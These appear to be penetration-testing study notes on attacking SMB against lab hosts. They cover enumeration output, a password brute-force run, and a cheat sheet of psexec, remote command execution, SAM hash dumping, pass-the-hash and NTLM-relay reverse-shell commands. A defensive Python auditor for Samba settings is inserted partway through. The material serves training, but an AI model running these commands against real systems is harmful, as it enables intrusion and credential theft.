ATTACKING COMMONLY USED SERVICES: PART_03 Exploiting SMB

Sharing is caring


Server Message Block (SMB) is a communication protocol created for providing shared access to files and printers across nodes on a network. Initially, it was designed to run on top of NetBIOS over TCP/IP (NBT) using TCP port 139 and UDP ports 137 and 138. However, with Windows 2000, Microsoft added the option to run SMB directly over TCP/IP on port 445 without the extra NetBIOS layer. Nowadays, modern Windows operating systems use SMB over TCP but still support the NetBIOS implementation as a failover.

On Windows, for instance, SMB runs directly over TCP port 445 without NetBIOS over TCP/IP, but if NetBIOS is enabled on the Windows host, or we are targeting a non-Windows host, we will also find SMB on TCP port 139. SMB on port 139 means SMB is running with NetBIOS over TCP/IP.

Samba is a Unix/Linux-based open-source implementation of the SMB protocol. It allows Linux/Unix servers and Windows clients to use the same SMB services.

Another protocol commonly related to SMB is MSRPC (Microsoft Remote Procedure Call). RPC gives an application developer a generic way to execute a procedure (a function) in a local or remote process without having to understand the network protocols that carry the call. MS-RPCE specifies RPC over SMB, which can use SMB named pipes as its underlying transport.

Enumeration

# nmap
sudo nmap 10.129.97.19 -sV -sC -p139,445
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-28 10:58 BST
Nmap scan report for 10.129.97.19
Host is up (0.0024s latency).

PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2023-04-28T09:59:11
|_  start_date: N/A
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.89 seconds

Enum4linux-ng

./enum4linux-ng.py 10.129.2.51 -A -C
ENUM4LINUX - next generation (v1.3.1)

 ==========================
|    Target Information    |
 ==========================
[*] Target ........... 10.129.2.51
[*] Username ......... ''
[*] Random Username .. 'wyokhvov'
[*] Password ......... ''
[*] Timeout .......... 5 second(s)

 ====================================
|    Listener Scan on 10.129.2.51    |
 ====================================
[*] Checking LDAP
[-] Could not connect to LDAP on 389/tcp: connection refused
[*] Checking LDAPS
[-] Could not connect to LDAPS on 636/tcp: connection refused
[*] Checking SMB
[+] SMB is accessible on 445/tcp
[*] Checking SMB over NetBIOS
[+] SMB over NetBIOS is accessible on 139/tcp

 ==========================================================
|    NetBIOS Names and Workgroup/Domain for 10.129.2.51    |
 ==========================================================
[+] Got domain/workgroup name: WORKGROUP
[+] Full NetBIOS names information:
- ATTCSVC-LINUX   <00> -         B <ACTIVE>  Workstation Service
- ATTCSVC-LINUX   <03> -         B <ACTIVE>  Messenger Service
- ATTCSVC-LINUX   <20> -         B <ACTIVE>  File Server Service
- WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
- WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections
- MAC Address = 00-00-00-00-00-00

 ========================================
|    SMB Dialect Check on 10.129.2.51    |
 ========================================
[*] Trying on 445/tcp
[+] Supported dialects and settings:
Supported dialects:
  SMB 1.0: false
  SMB 2.02: true
  SMB 2.1: true
  SMB 3.0: true
  SMB 3.1.1: true
Preferred dialect: SMB 3.0
SMB1 only: false
SMB signing required: false

 ==========================================================
|    Domain Information via SMB session for 10.129.2.51    |
 ==========================================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found domain information via SMB
NetBIOS computer name: ATTCSVC-LINUX
NetBIOS domain name: ''
DNS domain: ''
FQDN: attcsvc-linux
Derived membership: workgroup member
Derived domain: unknown

 ========================================
|    RPC Session Check on 10.129.2.51    |
 ========================================
[*] Check for null session
[+] Server allows session using username '', password ''
[*] Check for random user
[+] Server allows session using username 'wyokhvov', password ''
[H] Rerunning enumeration with user 'wyokhvov' might give more results

 ==================================================
|    Domain Information via RPC for 10.129.2.51    |
 ==================================================
[+] Domain: WORKGROUP
[+] Domain SID: NULL SID
[+] Membership: workgroup member

 ==============================================
|    OS Information via RPC for 10.129.2.51    |
 ==============================================
[*] Enumerating via unauthenticated SMB session on 445/tcp
[+] Found OS information via SMB
[*] Enumerating via 'srvinfo'
[+] Found OS information via 'srvinfo'
[+] After merging OS information we have the following result:
OS: Linux/Unix
OS version: '6.1'
OS release: ''
OS build: '0'
Native OS: not supported
Native LAN manager: not supported
Platform id: '500'
Server type: '0x809a03'
Server type string: Wk Sv PrQ Unx NT SNT attcsvc-linux Samba

 ====================================
|    Users via RPC on 10.129.2.51    |
 ====================================
[*] Enumerating users via 'querydispinfo'
[+] Found 2 user(s) via 'querydispinfo'
[*] Enumerating users via 'enumdomusers'
[+] Found 2 user(s) via 'enumdomusers'
[+] After merging user results we have 2 user(s) total:
'1000':
  username: jason
  name: ''
  acb: '0x00000010'
  description: ''
'1001':
  username: robin
  name: ''
  acb: '0x00000010'
  description: ''

 =====================================
|    Groups via RPC on 10.129.2.51    |
 =====================================
[*] Enumerating local groups
[+] Found 0 group(s) via 'enumalsgroups domain'
[*] Enumerating builtin groups
[+] Found 0 group(s) via 'enumalsgroups builtin'
[*] Enumerating domain groups
[+] Found 0 group(s) via 'enumdomgroups'

 =======================================
|    Services via RPC on 10.129.2.51    |
 =======================================
[+] Found 4 service(s):
NETLOGON:
  description: Net Logon
RemoteRegistry:
  description: Remote Registry Service
Spooler:
  description: Print Spooler
WINS:
  description: Windows Internet Name Service (WINS)

 =====================================
|    Shares via RPC on 10.129.2.51    |
 =====================================
[*] Enumerating shares
[+] Found 3 share(s):
GGJ:
  comment: Priv
  type: Disk
IPC$:
  comment: IPC Service (attcsvc-linux Samba)
  type: IPC
print$:
  comment: Printer Drivers
  type: Disk
[*] Testing share GGJ
[+] Mapping: OK, Listing: OK
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A

 ========================================
|    Policies via RPC for 10.129.2.51    |
 ========================================
[*] Trying port 445/tcp
[+] Found policy:
Domain password information:
  Password history length: None
  Minimum password length: 5
  Maximum password age: 49710 days 6 hours 21 minutes
  Password properties:
  - DOMAIN_PASSWORD_COMPLEX: false
  - DOMAIN_PASSWORD_NO_ANON_CHANGE: false
  - DOMAIN_PASSWORD_NO_CLEAR_CHANGE: false
  - DOMAIN_PASSWORD_LOCKOUT_ADMINS: false
  - DOMAIN_PASSWORD_PASSWORD_STORE_CLEARTEXT: false
  - DOMAIN_PASSWORD_REFUSE_PASSWORD_CHANGE: false
Domain lockout information:
  Lockout observation window: 30 minutes
  Lockout duration: 30 minutes
  Lockout threshold: None
Domain logoff information:
  Force logoff time: 49710 days 6 hours 21 minutes

 ========================================
|    Printers via RPC for 10.129.2.51    |
 ========================================
[+] No printers returned (this is not an error)

Completed after 1.20 seconds
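As an added example (not part of these notes or of enum4linux-ng itself), the Python below maps lines of an enum4linux-ng report like the one above to findings and to the Samba setting that closes each one. The embedded report text is a constructed excerpt in the tool's format, and the severity ratings and remediation mapping are my own assumptions.

```python
import re

# Constructed excerpt in enum4linux-ng's output format, mirroring the lab scan
# above (share and host names are that scan's, not real assets).
SAMPLE = """\
[+] Server allows session using username '', password ''
  SMB 1.0: false
SMB signing required: false
[*] Testing share GGJ
[+] Mapping: OK, Listing: OK
[*] Testing share IPC$
[-] Could not check share: STATUS_OBJECT_NAME_NOT_FOUND
[*] Testing share print$
[+] Mapping: DENIED, Listing: N/A
  Minimum password length: 5
  Lockout threshold: None
"""
# (regex, severity, finding, Samba smb.conf directive or pdbedit command that fixes it)
CHECKS = [
    (r"allows session using username '', password ''", "high",
     "null session accepted (anonymous RPC and share enumeration)", "restrict anonymous = 2"),
    (r"^SMB signing required: false$", "high",
     "SMB signing not required (NTLM relay to this host is possible)", "server signing = mandatory"),
    (r"^\s*SMB 1\.0: true$", "high",
     "SMB1 dialect offered", "server min protocol = SMB2"),
    (r"Lockout threshold: None", "medium",
     "no account lockout (password spraying is unthrottled)", 'pdbedit -P "bad lockout attempt" -C 5'),
]

def audit(report: str) -> list[tuple[str, str, str]]:
    """Return (severity, finding, fix) triples for weak settings in an enum4linux-ng report."""
    findings = [(sev, what, fix) for rx, sev, what, fix in CHECKS
                if re.search(rx, report, re.M)]
    m = re.search(r"Minimum password length: (\d+)", report)
    if m and int(m.group(1)) < 8:
        findings.append(("medium", f"minimum password length is {m.group(1)}",
                         'pdbedit -P "min password length" -C 12'))
    # Shares that both mapped and listed during the unauthenticated pass
    share = None
    for line in report.splitlines():
        m = re.match(r"\[\*\] Testing share (\S+)", line)
        if m:
            share = m.group(1)
        elif share and line.startswith(("[+]", "[-]")):
            if "Mapping: OK, Listing: OK" in line:
                findings.append(("medium", f"share {share} lists without credentials",
                                 f"[{share}] guest ok = no, valid users = <owners>"))
            share = None
    return findings
```

Run against the sample it reports five findings: two high (null session, signing) and three medium (no lockout, short minimum password, the GGJ share), while print$ (mapping denied) and the disabled SMB1 dialect produce none.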

CrackMapExec (CME)

$ crackmapexec smb 10.129.2.51 -u jason -p pass.txt --local-auth
SMB         10.129.2.51     445    ATTCSVC-LINUX    [*] Windows 6.1 Build 0 (name:ATTCSVC-LINUX) (domain:ATTCSVC-LINUX) (signing:False) (SMBv1:False)
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:liverpool STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:theman STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:bandit STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:dolphins STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:maddog STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:packers STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:jaguar STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:lovers STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:nicholas STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:united STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:tiffany STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:maxwell STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:zzzzzz STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:nirvana STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:jeremy STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:suckit STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:stupid STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:porn STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:monica STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:elephant STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:giants STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:jackass STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:hotdog STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:rosebud STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:success STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:debbie STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:mountain STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:444444 STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:xxxxxxxx0 STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:warrior STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [-] ATTCSVC-LINUX\jason:1q2w3e4r5t STATUS_LOGON_FAILURE 
SMB         10.129.2.51     445    ATTCSVC-LINUX    [+] ATTCSVC-LINUX\jason:xxxxxxxxxxxxxxxxxxxx

HACKTHEBOX ACADEMY module ‘Attacking SMB’

Command
    Description

smbclient -N -L //10.129.14.128
    Null-session testing against the SMB service.
smbmap -H 10.129.14.128
    Network share enumeration using smbmap.
smbmap -H 10.129.14.128 -r notes
    Recursive network share enumeration using smbmap.
smbmap -H 10.129.14.128 --download "notes\note.txt"
    Download a specific file from the shared folder.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt"
    Upload a specific file to the shared folder.
rpcclient -U'%' 10.10.110.17
    Null session with rpcclient.
./enum4linux-ng.py 10.10.11.45 -A -C
    Automated enumeration of the SMB service using enum4linux-ng.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!'
    Password spraying against different users from a list.
impacket-psexec administrator:'Password123!'@10.10.110.17
    Connect to the SMB service using impacket-psexec.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec
    Execute a command over the SMB service using crackmapexec.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users
    Enumerate logged-on users.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam
    Extract hashes from the SAM database.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE
    Use the pass-the-hash technique to authenticate on the target host.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146
    Dump the SAM database using impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e <base64 reverse shell>'
    Execute a PowerShell-based reverse shell using impacket-ntlmrelayx.